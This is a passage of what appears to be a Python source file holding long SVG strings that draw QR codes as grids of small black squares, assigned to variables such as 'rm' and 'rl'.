12 z M 26.4 7.2 L 26.4 8.4 L 27.6 8.4 L 27.6 7.2 z M 25.2 16.8 L 25.2 18.0 L 26.4 18.0 L 26.4 16.8 z M 20.4 22.8 L 20.4 24.0 L 21.6 24.0 L 21.6 22.8 z M 28.8 6 L 28.8 7.2 L 30.0 7.2 L 30.0 6 z M 7.2 28.8 L 7.2 30.0 L 8.4 30.0 L 8.4 
28.8 z M 8.4 15.6 L 8.4 16.8 L 9.6 16.8 L 9.6 15.6 z M 7.2 8.4 L 7.2 9.6 L 8.4 9.6 L 8.4 8.4 z M 14.4 13.2 L 14.4 14.4 L 15.6 14.4 L 15.6 13.2 z M 9.6 7.2 L 9.6 8.4 L 10.8 8.4 L 10.8 7.2 z M 7.2 21.6 L 7.2 22.8 L 8.4 22.8 L 8.4 21.6 z M 12 10.8 L 12 12.0 L 13.2 12.0 L 13.2 10.8 z M 18 13.2 L 18 14.4 L 19.2 14.4 L 19.2 13.2 z M 16.8 10.8 L 16.8 12.0 L 18.0 12.0 L 18.0 10.8 z M 12 14.4 L 12 15.6 L 13.2 15.6 L 13.2 14.4 z M 21.6 24 L 21.6 25.2 L 22.8 25.2 L 22.8 24 z M 27.6 24 L 27.6 25.2 L 28.8 25.2 L 28.8 24 z M 25.2 4.8 L 25.2 6.0 L 26.4 6.0 L 26.4 4.8 z M 24 14.4 L 24 15.6 L 25.2 15.6 L 25.2 14.4 z M 4.8 27.6 L 4.8 28.8 L 6.0 28.8 L 6.0 27.6 z M 19.2 27.6 L 19.2 28.8 L 20.4 28.8 L 20.4 27.6 z M 4.8 12 L 4.8 13.2 L 6.0 13.2 L 6.0 12 z M 22.8 12 L 22.8 13.2 L 24.0 13.2 L 24.0 12 z M 28.8 12 L 28.8 13.2 L 30.0 13.2 L 30.0 12 z M 26.4 26.4 L 26.4 27.6 L 27.6 27.6 L 27.6 26.4 z M 8.4 9.6 L 8.4 10.8 L 9.6 10.8 L 9.6 9.6 z M 7.2 9.6 L 7.2 10.8 L 8.4 10.8 L 8.4 9.6 z M 15.6 19.2 L 15.6 20.4 L 16.8 20.4 L 16.8 19.2 z M 14.4 9.6 L 14.4 10.8 L 15.6 10.8 L 15.6 9.6 z M 16.8 18 L 16.8 19.2 L 18.0 19.2 L 18.0 18 z M 12 12 L 12 13.2 L 13.2 13.2 L 13.2 12 z M 10.8 12 L 10.8 13.2 L 12.0 13.2 L 12.0 12 z M 9.6 26.4 L 9.6 27.6 L 10.8 27.6 L 10.8 26.4 z M 18 7.2 L 18 8.4 L 19.2 8.4 L 19.2 7.2 z M 16.8 12 L 16.8 13.2 L 18.0 13.2 L 18.0 12 z M 24 7.2 L 24 8.4 L 25.2 8.4 L 25.2 7.2 z M 19.2 10.8 L 19.2 12.0 L 20.4 12.0 L 20.4 10.8 z M 25.2 8.4 L 25.2 9.6 L 26.4 9.6 L 26.4 8.4 z M 22.8 14.4 L 22.8 15.6 L 24.0 15.6 L 24.0 14.4 z M 21.6 4.8 L 21.6 6.0 L 22.8 6.0 L 22.8 4.8 z M 4.8 24 L 4.8 25.2 L 6.0 25.2 L 6.0 24 z M 19.2 24 L 19.2 25.2 L 20.4 25.2 L 20.4 24 z M 27.6 4.8 L 27.6 6.0 L 28.8 6.0 L 28.8 4.8 z M 26.4 14.4 L 26.4 15.6 L 27.6 15.6 L 27.6 14.4 z M 4.8 8.4 L 4.8 9.6 L 6.0 9.6 L 6.0 8.4 z M 8.4 21.6 L 8.4 22.8 L 9.6 22.8 L 9.6 21.6 z M 9.6 15.6 L 9.6 16.8 L 10.8 16.8 L 10.8 15.6 z M 8.4 8.4 L 8.4 9.6 L 9.6 9.6 L 9.6 8.4 z M 7.2 15.6 L 7.2 16.8 L 8.4 16.8 L 8.4 15.6 z M 15.6 22.8 L 15.6 24.0 L 16.8 24.0 L 16.8 22.8 z M 10.8 19.2 L 10.8 20.4 L 12.0 20.4 L 12.0 19.2 z M 9.6 9.6 L 9.6 10.8 L 10.8 10.8 L 10.8 9.6 z M 8.4 28.8 L 8.4 30.0 L 9.6 30.0 L 9.6 28.8 z M 16.8 19.2 L 16.8 20.4 L 18.0 20.4 L 18.0 19.2 z M 14.4 28.8 L 14.4 30.0 L 15.6 30.0 L 15.6 28.8 z M 12 8.4 L 12 9.6 L 13.2 9.6 L 13.2 8.4 z M 15.6 25.2 L 15.6 26.4 L 16.8 26.4 L 16.8 25.2 z M 22.8 26.4 L 22.8 27.6 L 24.0 27.6 L 24.0 26.4 z M 21.6 21.6 L 21.6 22.8 L 22.8 22.8 L 22.8 21.6 z M 27.6 16.8 L 27.6 18.0 L 28.8 18.0 L 28.8 16.8 z M 22.8 22.8 L 22.8 24.0 L 24.0 24.0 L 24.0 22.8 z M 20.4 18 L 20.4 19.2 L 21.6 19.2 L 21.6 18 z M 7.2 24 L 7.2 25.2 L 8.4 25.2 L 8.4 24 z M 4.8 4.8 L 4.8 6.0 L 6.0 6.0 L 6.0 4.8 z M 25.2 27.6 L 25.2 28.8 L 26.4 28.8 L 26.4 27.6 z M 9.6 21.6 L 9.6 22.8 L 10.8 22.8 L 10.8 21.6 z M 16.8 6 L 16.8 7.2 L 18.0 7.2 L 18.0 6 z M 14.4 25.2 L 14.4 26.4 L 15.6 26.4 L 15.6 25.2 z M 12 19.2 L 12 20.4 L 13.2 20.4 L 13.2 19.2 z M 21.6 28.8 L 21.6 30.0 L 22.8 30.0 L 22.8 28.8 z M 9.6 28.8 L 9.6 30.0 L 10.8 30.0 L 10.8 28.8 z M 18 19.2 L 18 20.4 L 19.2 20.4 L 19.2 19.2 z M 27.6 28.8 L 27.6 30.0 L 28.8 30.0 L 28.8 28.8 z M 25.2 9.6 L 25.2 10.8 L 26.4 10.8 L 26.4 9.6 z M 13.2 15.6 L 13.2 16.8 L 14.4 16.8 L 14.4 15.6 z M 22.8 25.2 L 22.8 26.4 L 24.0 26.4 L 24.0 25.2 z M 12 27.6 L 12 28.8 L 13.2 28.8 L 13.2 27.6 z M 19.2 22.8 L 19.2 24.0 L 20.4 24.0 L 20.4 22.8 z M 26.4 8.4 L 26.4 9.6 L 27.6 9.6 L 27.6 8.4 z M 25.2 15.6 L 25.2 16.8 L 26.4 16.8 L 26.4 15.6 z M 28.8 7.2 L 28.8 8.4 L 30.0 8.4 L 30.0 7.2 z M 26.4 21.6 L 26.4 22.8 L 27.6 22.8 L 
27.6 21.6 z M 8.4 14.4 L 8.4 15.6 L 9.6 15.6 L 9.6 14.4 z M 7.2 4.8 L 7.2 6.0 L 8.4 6.0 L 8.4 4.8 z M 9.6 8.4 L 9.6 9.6 L 10.8 9.6 L 10.8 8.4 z M 15.6 10.8 L 15.6 12.0 L 16.8 12.0 L 16.8 10.8 z" id="qr-path" style="fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:none"></path></svg>"""
rm = """<svg height="52.2mm" version="1.1" viewBox="0 0 52.2 52.2" width="52.2mm" xmlns="http://www.w3.org/2000/svg"><path d="M 36 18 L 36 19.8 L 37.8 19.8 L 37.8 18 z M 32.4 37.8 L 32.4 39.6 L 34.2 39.6 L 34.2 37.8 z M 28.8 9 L 28.8 10.8 L 30.6 10.8 L 30.6 9 z M 25.2 37.8 L 25.2 39.6 L 27.0 39.6 L 27.0 37.8 z M 7.2 43.2 L 7.2 45.0 L 9.0 45.0 L 9.0 43.2 z M 36 23.4 L 36 25.2 L 37.8 25.2 L 37.8 23.4 z M 32.4 14.4 L 32.4 16.2 L 34.2 16.2 L 34.2 14.4 z M 39.6 14.4 L 39.6 16.2 L 41.4 16.2 L 41.4 14.4 z M 30.6 37.8 L 30.6 39.6 L 32.4 39.6 L 32.4 37.8 z M 9 18 L 9 19.8 L 10.8 19.8 L 10.8 18 z M 7.2 25.2 L 7.2 27.0 L 9.0 27.0 L 9.0 25.2 z M 39.6 41.4 L 39.6 43.2 L 41.4 43.2 L 41.4 41.4 z M 21.6 16.2 L 21.6 18.0 L 23.4 18.0 L 23.4 16.2 z M 16.2 21.6 L 16.2 23.4 L 18.0 23.4 L 18.0 21.6 z M 14.4 7.2 L 14.4 9.0 L 16.2 9.0 L 16.2 7.2 z M 25.2 21.6 L 25.2 23.4 L 27.0 23.4 L 27.0 21.6 z M 23.4 7.2 L 23.4 9.0 L 25.2 9.0 L 25.2 7.2 z M 25.2 19.8 L 25.2 21.6 L 27.0 21.6 L 27.0 19.8 z M 36 12.6 L 36 14.4 L 37.8 14.4 L 37.8 12.6 z M 18 25.2 L 18 27.0 L 19.8 27.0 L 19.8 25.2 z M 28.8 18 L 28.8 19.8 L 30.6 19.8 L 30.6 18 z M 41.4 32.4 L 41.4 34.2 L 43.2 34.2 L 43.2 32.4 z M 37.8 10.8 L 37.8 12.6 L 39.6 12.6 L 39.6 10.8 z M 7.2 37.8 L 7.2 39.6 L 9.0 39.6 L 9.0 37.8 z M 32.4 9 L 32.4 10.8 L 34.2 10.8 L 34.2 9 z M 43.2 23.4 L 43.2 25.2 L 45.0 25.2 L 45.0 23.4 z M 39.6 23.4 L 39.6 25.2 L 41.4 25.2 L 41.4 23.4 z M 7.2 14.4 L 7.2 16.2 L 9.0 16.2 L 9.0 14.4 z M 43.2 14.4 L 43.2 16.2 L 45.0 16.2 L 45.0 14.4 z M 21.6 34.2 L 21.6 36.0 L 23.4 36.0 L 23.4 34.2 z M 14.4 25.2 L 14.4 27.0 L 16.2 27.0 L 16.2 25.2 z M 12.6 10.8 L 12.6 12.6 L 14.4 12.6 L 14.4 10.8 z M 10.8 18 L 10.8 19.8 L 12.6 19.8 L 12.6 18 z M 23.4 32.4 L 23.4 34.2 L 25.2 34.2 L 25.2 32.4 z M 21.6 10.8 L 21.6 12.6 L 23.4 12.6 L 23.4 10.8 z M 18 7.2 L 18 9.0 L 19.8 9.0 L 19.8 7.2 z M 14.4 36 L 14.4 37.8 L 16.2 37.8 L 16.2 36 z M 27 7.2 L 27 9.0 L 28.8 9.0 L 28.8 7.2 z M 23.4 36 L 23.4 37.8 L 25.2 37.8 L 25.2 36 z M 36 7.2 L 36 9.0 L 37.8 9.0 L 37.8 7.2 z M 37.8 30.6 L 37.8 32.4 L 39.6 32.4 L 39.6 30.6 z M 36 41.4 L 36 43.2 L 37.8 43.2 L 37.8 41.4 z M 32.4 10.8 L 32.4 12.6 L 34.2 12.6 L 34.2 10.8 z M 30.6 25.2 L 30.6 27.0 L 32.4 27.0 L 32.4 25.2 z M 10.8 37.8 L 10.8 39.6 L 12.6 39.6 L 12.6 37.8 z M 39.6 25.2 L 39.6 27.0 L 41.4 27.0 L 41.4 25.2 z M 7.2 9 L 7.2 10.8 L 9.0 10.8 L 9.0 9 z M 9 28.8 L 9 30.6 L 10.8 30.6 L 10.8 28.8 z M 21.6 28.8 L 21.6 30.6 L 23.4 30.6 L 23.4 28.8 z M 16.2 32.4 L 16.2 34.2 L 18.0 34.2 L 18.0 32.4 z M 12.6 39.6 L 12.6 41.4 L 14.4 41.4 L 14.4 39.6 z M 21.6 39.6 L 21.6 41.4 L 23.4 41.4 L 23.4 39.6 z M 27 34.2 L 27 36.0 L 28.8 36.0 L 28.8 34.2 z M 23.4 41.4 L 23.4 43.2 L 25.2 43.2 L 25.2 41.4 z M 34.2 36 L 34.2 37.8 L 36.0 37.8 L 36.0 36 z M 32.4 21.6 L 32.4 23.4 L 34.2 23.4 L 34.2 21.6 z M 18 36 L 18 37.8 L 19.8 37.8 L 19.8 36 z M 28.8 21.6 L 28.8 23.4 L 30.6 23.4 L 30.6 21.6 z M 43.2 36 L 43.2 37.8 L 45.0 37.8 L 45.0 36 z M 39.6 7.2 L 39.6 9.0 L 41.4 9.0 L 41.4 7.2 z M 37.8 21.6 L 37.8 23.4 L 39.6 23.4 L 39.6 21.6 z M 43.2 12.6 L 43.2 14.4 L 45.0 14.4 L 45.0 12.6 z M 10.8 39.6 L 10.8 41.4 L 12.6 41.4 L 12.6 39.6 z M 39.6 34.2 L 39.6 36.0 L 41.4 36.0 L 41.4 34.2 z M 7.2 32.4 L 7.2 34.2 L 9.0 34.2 L 9.0 32.4 z M 10.8 28.8 L 10.8 30.6 L 12.6 30.6 L 12.6 28.8 z M 12.6 37.8 L 12.6 39.6 L 14.4 39.6 L 14.4 37.8 z M 18 32.4 L 18 34.2 L 19.8 34.2 L 19.8 32.4 z M 27 25.2 L 27 27.0 L 28.8 27.0 L 28.8 25.2 z M 37.8 18 L 37.8 19.8 L 39.6 19.8 L 39.6 18 z M 32.4 16.2 L 32.4 18.0 L 34.2 18.0 L 34.2 16.2 z M 28.8 30.6 L 28.8 32.4 L 30.6 32.4 L 30.6 
30.6 z M 37.8 27 L 37.8 28.8 L 39.6 28.8 L 39.6 27 z M 34.2 7.2 L 34.2 9.0 L 36.0 9.0 L 36.0 7.2 z M 43.2 7.2 L 43.2 9.0 L 45.0 9.0 L 45.0 7.2 z M 7.2 27 L 7.2 28.8 L 9.0 28.8 L 9.0 27 z M 12.6 18 L 12.6 19.8 L 14.4 19.8 L 14.4 18 z M 10.8 10.8 L 10.8 12.6 L 12.6 12.6 L 12.6 10.8 z M 9 25.2 L 9 27.0 L 10.8 27.0 L 10.8 25.2 z M 21.6 18 L 21.6 19.8 L 23.4 19.8 L 23.4 18 z M 23.4 19.8 L 23.4 21.6 L 25.2 21.6 L 25.2 19.8 z M 18 14.4 L 18 16.2 L 19.8 16.2 L 19.8 14.4 z M 27 14.4 L 27 16.2 L 28.8 16.2 L 28.8 14.4 z M 25.2 14.4 L 25.2 16.2 L 27.0 16.2 L 27.0 14.4 z M 23.4 43.2 L 23.4 45.0 L 25.2 45.0 L 25.2 43.2 z M 36 14.4 L 36 16.2 L 37.8 16.2 L 37.8 14.4 z M 28.8 19.8 L 28.8 21.6 L 30.6 21.6 L 30.6 19.8 z M 7.2 39.6 L 7.2 41.4 L 9.0 41.4 L 9.0 39.6 z M 32.4 18 L 32.4 19.8 L 34.2 19.8 L 34.2 18 z M 28.8 39.6 L 28.8 41.4 L 30.6 41.4 L 30.6 39.6 z M 39.6 18 L 39.6 19.8 L 41.4 19.8 L 41.4 18 z M 7.2 16.2 L 7.2 18.0 L 9.0 18.0 L 9.0 16.2 z M 30.6 41.4 L 30.6 43.2 L 32.4 43.2 L 32.4 41.4 z M 43.2 16.2 L 43.2 18.0 L 45.0 18.0 L 45.0 16.2 z M 9 7.2 L 9 9.0 L 10.8 9.0 L 10.8 7.2 z M 7.2 21.6 L 7.2 23.4 L 9.0 23.4 L 9.0 21.6 z M 23.4 30.6 L 23.4 32.4 L 25.2 32.4 L 25.2 30.6 z M 21.6 12.6 L 21.6 14.4 L 23.4 14.4 L 23.4 12.6 z M 14.4 18 L 14.4 19.8 L 16.2 19.8 L 16.2 18 z M 18 9 L 18 10.8 L 19.8 10.8 L 19.8 9 z M 14.4 37.8 L 14.4 39.6 L 16.2 39.6 L 16.2 37.8 z M 32.4 28.8 L 32.4 30.6 L 34.2 30.6 L 34.2 28.8 z M 16.2 43.2 L 16.2 45.0 L 18.0 45.0 L 18.0 43.2 z M 28.8 14.4 L 28.8 16.2 L 30.6 16.2 L 30.6 14.4 z M 18 43.2 L 18 45.0 L 19.8 45.0 L 19.8 43.2 z M 25.2 43.2 L 25.2 45.0 L 27.0 45.0 L 27.0 43.2 z M 27 43.2 L 27 45.0 L 28.8 45.0 L 28.8 43.2 z M 34.2 23.4 L 34.2 25.2 L 36.0 25.2 L 36.0 23.4 z M 32.4 12.6 L 32.4 14.4 L 34.2 14.4 L 34.2 12.6 z M 30.6 23.4 L 30.6 25.2 L 32.4 25.2 L 32.4 23.4 z M 36 43.2 L 36 45.0 L 37.8 45.0 L 37.8 43.2 z M 39.6 27 L 39.6 28.8 L 41.4 28.8 L 41.4 27 z M 7.2 10.8 L 7.2 12.6 L 9.0 12.6 L 9.0 10.8 z M 37.8 37.8 L 37.8 39.6 L 39.6 39.6 L 39.6 37.8 z M 21.6 30.6 L 21.6 32.4 L 23.4 32.4 L 23.4 30.6 z M 14.4 21.6 L 14.4 23.4 L 16.2 23.4 L 16.2 21.6 z M 12.6 7.2 L 12.6 9.0 L 14.4 9.0 L 14.4 7.2 z M 10.8 21.6 L 10.8 23.4 L 12.6 23.4 L 12.6 21.6 z M 23.4 21.6 L 23.4 23.4 L 25.2 23.4 L 25.2 21.6 z M 25.2 34.2 L 25.2 36.0 L 27.0 36.0 L 27.0 34.2 z M 18 10.8 L 18 12.6 L 19.8 12.6 L 19.8 10.8 z M 23.4 39.6 L 23.4 41.4 L 25.2 41.4 L 25.2 39.6 z M 32.4 23.4 L 32.4 25.2 L 34.2 25.2 L 34.2 23.4 z M 18 37.8 L 18 39.6 L 19.8 39.6 L 19.8 37.8 z M 28.8 23.4 L 28.8 25.2 L 30.6 25.2 L 30.6 23.4 z M 9 43.2 L 9 45.0 L 10.8 45.0 L 10.8 43.2 z M 37.8 34.2 L 37.8 36.0 L 39.6 36.0 L 39.6 34.2 z M 36 37.8 L 36 39.6 L 37.8 39.6 L 37.8 37.8 z M 30.6 28.8 L 30.6 30.6 L 32.4 30.6 L 32.4 28.8 z M 43.2 28.8 L 43.2 30.6 L 45.0 30.6 L 45.0 28.8 z M 28.8 43.2 L 28.8 45.0 L 30.6 45.0 L 30.6 43.2 z M 7.2 34.2 L 7.2 36.0 L 9.0 36.0 L 9.0 34.2 z M 12.6 25.2 L 12.6 27.0 L 14.4 27.0 L 14.4 25.2 z M 9 32.4 L 9 34.2 L 10.8 34.2 L 10.8 32.4 z M 23.4 27 L 23.4 28.8 L 25.2 28.8 L 25.2 27 z M 16.2 7.2 L 16.2 9.0 L 18.0 9.0 L 18.0 7.2 z M 12.6 36 L 12.6 37.8 L 14.4 37.8 L 14.4 36 z M 25.2 7.2 L 25.2 9.0 L 27.0 9.0 L 27.0 7.2 z M 21.6 36 L 21.6 37.8 L 23.4 37.8 L 23.4 36 z M 18 34.2 L 18 36.0 L 19.8 36.0 L 19.8 34.2 z M 36 27 L 36 28.8 L 37.8 28.8 L 37.8 27 z M 32.4 25.2 L 32.4 27.0 L 34.2 27.0 L 34.2 25.2 z M 18 39.6 L 18 41.4 L 19.8 41.4 L 19.8 39.6 z M 28.8 32.4 L 28.8 34.2 L 30.6 34.2 L 30.6 32.4 z M 41.4 18 L 41.4 19.8 L 43.2 19.8 L 43.2 18 z M 39.6 10.8 L 39.6 12.6 L 41.4 12.6 L 41.4 10.8 z M 37.8 25.2 L 37.8 27.0 L 
39.6 27.0 L 39.6 25.2 z M 30.6 34.2 L 30.6 36.0 L 32.4 36.0 L 32.4 34.2 z M 43.2 9 L 43.2 10.8 L 45.0 10.8 L 45.0 9 z M 10.8 43.2 L 10.8 45.0 L 12.6 45.0 L 12.6 43.2 z M 12.6 23.4 L 12.6 25.2 L 14.4 25.2 L 14.4 23.4 z M 10.8 12.6 L 10.8 14.4 L 12.6 14.4 L 12.6 12.6 z M 21.6 19.8 L 21.6 21.6 L 23.4 21.6 L 23.4 19.8 z M 14.4 10.8 L 14.4 12.6 L 16.2 12.6 L 16.2 10.8 z M 10.8 32.4 L 10.8 34.2 L 12.6 34.2 L 12.6 32.4 z M 18 16.2 L 18 18.0 L 19.8 18.0 L 19.8 16.2 z M 27 19.8 L 27 21.6 L 28.8 21.6 L 28.8 19.8 z M 25.2 16.2 L 25.2 18.0 L 27.0 18.0 L 27.0 16.2 z M 18 21.6 L 18 23.4 L 19.8 23.4 L 19.8 21.6 z M 32.4 36 L 32.4 37.8 L 34.2 37.8 L 34.2 36 z M 41.4 36 L 41.4 37.8 L 43.2 37.8 L 43.2 36 z M 37.8 7.2 L 37.8 9.0 L 39.6 9.0 L 39.6 7.2 z M 36 21.6 L 36 23.4 L 37.8 23.4 L 37.8 21.6 z M 7.2 41.4 L 7.2 43.2 L 9.0 43.2 L 9.0 41.4 z M 28.8 41.4 L 28.8 43.2 L 30.6 43.2 L 30.6 41.4 z M 7.2 18 L 7.2 19.8 L 9.0 19.8 L 9.0 18 z M 34.2 18 L 34.2 19.8 L 36.0 19.8 L 36.0 18 z M 43.2 18 L 43.2 19.8 L 45.0 19.8 L 45.0 18 z M 39.6 39.6 L 39.6 41.4 L 41.4 41.4 L 41.4 39.6 z M 12.6 14.4 L 12.6 16.2 L 14.4 16.2 L 14.4 14.4 z M 10.8 14.4 L 10.8 16.2 L 12.6 16.2 L 12.6 14.4 z M 23.4 28.8 L 23.4 30.6 L 25.2 30.6 L 25.2 28.8 z M 21.6 14.4 L 21.6 16.2 L 23.4 16.2 L 23.4 14.4 z M 25.2 27 L 25.2 28.8 L 27.0 28.8 L 27.0 27 z M 18 18 L 18 19.8 L 19.8 19.8 L 19.8 18 z M 16.2 18 L 16.2 19.8 L 18.0 19.8 L 18.0 18 z M 14.4 39.6 L 14.4 41.4 L 16.2 41.4 L 16.2 39.6 z M 27 10.8 L 27 12.6 L 28.8 12.6 L 28.8 10.8 z M 25.2 18 L 25.2 19.8 L 27.0 19.8 L 27.0 18 z M 36 10.8 L 36 12.6 L 37.8 12.6 L 37.8 10.8 z M 28.8 16.2 L 28.8 18.0 L 30.6 18.0 L 30.6 16.2 z M 37.8 12.6 L 37.8 14.4 L 39.6 14.4 L 39.6 12.6 z M 34.2 21.6 L 34.2 23.4 L 36.0 23.4 L 36.0 21.6 z M 32.4 7.2 L 32.4 9.0 L 34.2 9.0 L 34.2 7.2 z M 7.2 36 L 7.2 37.8 L 9.0 37.8 L 9.0 36 z M 28.8 36 L 28.8 37.8 L 30.6 37.8 L 30.6 36 z M 41.4 7.2 L 41.4 9.0 L 43.2 9.0 L 43.2 7.2 z M 39.6 21.6 L 39.6 23.4 L 41.4 23.4 L 41.4 21.6 z M 7.2 12.6 L 7.2 14.4 L 9.0 14.4 L 9.0 12.6 z M 12.6 32.4 L 12.6 34.2 L 14.4 34.2 L 14.4 32.4 z M 14.4 23.4 L 14.4 25.2 L 16.2 25.2 L 16.2 23.4 z M 12.6 12.6 L 12.6 14.4 L 14.4 14.4 L 14.4 12.6 z M 10.8 23.4 L 10.8 25.2 L 12.6 25.2 L 12.6 23.4 z M 23.4 34.2 L 23.4 36.0 L 25.2 36.0 L 25.2 34.2 z M 16.2 28.8 L 16.2 30.6 L 18.0 30.6 L 18.0 28.8 z M 14.4 14.4 L 14.4 16.2 L 16.2 16.2 L 16.2 14.4 z M 12.6 43.2 L 12.6 45.0 L 14.4 45.0 L 14.4 43.2 z M 25.2 28.8 L 25.2 30.6 L 27.0 30.6 L 27.0 28.8 z M 21.6 43.2 L 21.6 45.0 L 23.4 45.0 L 23.4 43.2 z M 18 12.6 L 18 14.4 L 19.8 14.4 L 19.8 12.6 z M 23.4 37.8 L 23.4 39.6 L 25.2 39.6 L 25.2 37.8 z M 34.2 39.6 L 34.2 41.4 L 36.0 41.4 L 36.0 39.6 z M 32.4 32.4 L 32.4 34.2 L 34.2 34.2 L 34.2 32.4 z M 41.4 25.2 L 41.4 27.0 L 43.2 27.0 L 43.2 25.2 z M 34.2 34.2 L 34.2 36.0 L 36.0 36.0 L 36.0 34.2 z M 30.6 27 L 30.6 28.8 L 32.4 28.8 L 32.4 27 z M 10.8 36 L 10.8 37.8 L 12.6 37.8 L 12.6 36 z M 7.2 7.2 L 7.2 9.0 L 9.0 9.0 L 9.0 7.2 z M 37.8 41.4 L 37.8 43.2 L 39.6 43.2 L 39.6 41.4 z M 14.4 32.4 L 14.4 34.2 L 16.2 34.2 L 16.2 32.4 z M 25.2 9 L 25.2 10.8 L 27.0 10.8 L 27.0 9 z M 21.6 37.8 L 21.6 39.6 L 23.4 39.6 L 23.4 37.8 z M 18 28.8 L 18 30.6 L 19.8 30.6 L 19.8 28.8 z M 32.4 43.2 L 32.4 45.0 L 34.2 45.0 L 34.2 43.2 z M 14.4 43.2 L 14.4 45.0 L 16.2 45.0 L 16.2 43.2 z M 27 28.8 L 27 30.6 L 28.8 30.6 L 28.8 28.8 z M 41.4 43.2 L 41.4 45.0 L 43.2 45.0 L 43.2 43.2 z M 37.8 14.4 L 37.8 16.2 L 39.6 16.2 L 39.6 14.4 z M 19.8 23.4 L 19.8 25.2 L 21.6 25.2 L 21.6 23.4 z M 34.2 37.8 L 34.2 39.6 L 36.0 39.6 L 36.0 37.8 z M 18 41.4 L 18 43.2 
L 19.8 43.2 L 19.8 41.4 z M 28.8 34.2 L 28.8 36.0 L 30.6 36.0 L 30.6 34.2 z M 39.6 12.6 L 39.6 14.4 L 41.4 14.4 L 41.4 12.6 z M 37.8 23.4 L 37.8 25.2 L 39.6 25.2 L 39.6 23.4 z M 43.2 10.8 L 43.2 12.6 L 45.0 12.6 L 45.0 10.8 z M 39.6 32.4 L 39.6 34.2 L 41.4 34.2 L 41.4 32.4 z M 12.6 21.6 L 12.6 23.4 L 14.4 23.4 L 14.4 21.6 z M 10.8 7.2 L 10.8 9.0 L 12.6 9.0 L 12.6 7.2 z M 14.4 12.6 L 14.4 14.4 L 16.2 14.4 L 16.2 12.6 z M 23.4 16.2 L 23.4 18.0 L 25.2 18.0 L 25.2 16.2 z" id="qr-path" style="fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:none"></path></svg>"""
rl = """<svg height="87mm" version="1.1" viewBox="0 0 87 87" width="87mm" xmlns="http://www.w3.org/2000/svg"><path d="M 60 30 L 60 33 L 63 33 L 63 30 z M 54 63 L 54 66 L 57 66 L 57 63 z M 48 15 L 48 18 L 51 18 L 51 15 z M 42 63 L 42 66 L 45 66 L 45 63 z M 12 72 L 12 75 L 15 75 L 15 72 z M 60 39 L 60 42 L 63 42 L 63 39 z M 54 24 L 54 27 L 57 27 L 57 24 z M 66 24 L 66 27 L 69 27 L 69 24 z M 51 63 L 51 66 L 54 66 L 54 63 z M 15 30 L 15 33 L 18 33 L 18 30 z M 12 42 L 12 45 L 15 45 L 15 42 z M 66 69 L 66 72 L 69 72 L 69 69 z M 36 27 L 36 30 L 39 30 L 39 27 z M 27 36 L 27 39 L 30 39 L 30 36 z M 24 12 L 24 15 L 27 15 L 27 12 z M 42 36 L 42 39 L 45 39 L 45 36 z M 39 12 L 39 15 L 42 15 L 42 12 z M 42 33 L 42 36 L 45 36 L 45 33 z M 60 21 L 60 24 L 63 24 L 63 21 z M 30 42 L 30 45 L 33 45 L 33 42 z M 48 30 L 48 33 L 51 33 L 51 30 z M 69 54 L 69 57 L 72 57 L 72 54 z M 63 18 L 63 21 L 66 21 L 66 18 z M 12 63 L 12 66 L 15 66 L 15 63 z M 54 15 L 54 18 L 57 18 L 57 15 z M 72 39 L 72 42 L 75 42 L 75 39 z M 66 39 L 66 42 L 69 42 L 69 39 z M 12 24 L 12 27 L 15 27 L 15 24 z M 72 24 L 72 27 L 75 27 L 75 24 z M 36 57 L 36 60 L 39 60 L 39 57 z M 24 42 L 24 45 L 27 45 L 27 42 z M 21 18 L 21 21 L 24 21 L 24 18 z M 18 30 L 18 33 L 21 33 L 21 30 z M 39 54 L 39 57 L 42 57 L 42 54 z M 36 18 L 36 21 L 39 21 L 39 18 z M 30 12 L 30 15 L 33 15 L 33 12 z M 24 60 L 24 63 L 27 63 L 27 60 z M 45 12 L 45 15 L 48 15 L 48 12 z M 39 60 L 39 63 L 42 63 L 42 60 z M 60 12 L 60 15 L 63 15 L 63 12 z M 63 51 L 63 54 L 66 54 L 66 51 z M 60 69 L 60 72 L 63 72 L 63 69 z M 54 18 L 54 21 L 57 21 L 57 18 z M 51 42 L 51 45 L 54 45 L 54 42 z M 18 63 L 18 66 L 21 66 L 21 63 z M 66 42 L 66 45 L 69 45 L 69 42 z M 12 15 L 12 18 L 15 18 L 15 15 z M 15 48 L 15 51 L 18 51 L 18 48 z M 36 48 L 36 51 L 39 51 L 39 48 z M 27 54 L 27 57 L 30 57 L 30 54 z M 21 66 L 21 69 L 24 69 L 24 66 z M 36 66 L 36 69 L 39 69 L 39 66 z M 45 57 L 45 60 L 48 60 L 48 57 z M 39 69 L 39 72 L 42 72 L 42 69 z M 57 60 L 57 63 L 60 63 L 60 60 z M 54 36 L 54 39 L 57 39 L 57 36 z M 30 60 L 30 63 L 33 63 L 33 60 z M 48 36 L 48 39 L 51 39 L 51 36 z M 72 60 L 72 63 L 75 63 L 75 60 z M 66 12 L 66 15 L 69 15 L 69 12 z M 63 36 L 63 39 L 66 39 L 66 36 z M 72 21 L 72 24 L 75 24 L 75 21 z M 18 66 L 18 69 L 21 69 L 21 66 z M 66 57 L 66 60 L 69 60 L 69 57 z M 12 54 L 12 57 L 15 57 L 15 54 z M 18 48 L 18 51 L 21 51 L 21 48 z M 21 63 L 21 66 L 24 66 L 24 63 z M 30 54 L 30 57 L 33 57 L 33 54 z M 45 42 L 45 45 L 48 45 L 48 42 z M 63 30 L 63 33 L 66 33 L 66 30 z M 54 27 L 54 30 L 57 30 L 57 27 z M 48 51 L 48 54 L 51 54 L 51 51 z M 63 45 L 63 48 L 66 48 L 66 45 z M 57 12 L 57 15 L 60 15 L 60 12 z M 72 12 L 72 15 L 75 15 L 75 12 z M 12 45 L 12 48 L 15 48 L 15 45 z M 21 30 L 21 33 L 24 33 L 24 30 z M 18 18 L 18 21 L 21 21 L 21 18 z M 15 42 L 15 45 L 18 45 L 18 42 z M 36 30 L 36 33 L 39 33 L 39 30 z M 39 33 L 39 36 L 42 36 L 42 33 z M 30 24 L 30 27 L 33 27 L 33 24 z M 45 24 L 45 27 L 48 27 L 48 24 z M 42 24 L 42 27 L 45 27 L 45 24 z M 39 72 L 39 75 L 42 75 L 42 72 z M 60 24 L 60 27 L 63 27 L 63 24 z M 48 33 L 48 36 L 51 36 L 51 33 z M 12 66 L 12 69 L 15 69 L 15 66 z M 54 30 L 54 33 L 57 33 L 57 30 z M 48 66 L 48 69 L 51 69 L 51 66 z M 66 30 L 66 33 L 69 33 L 69 30 z M 12 27 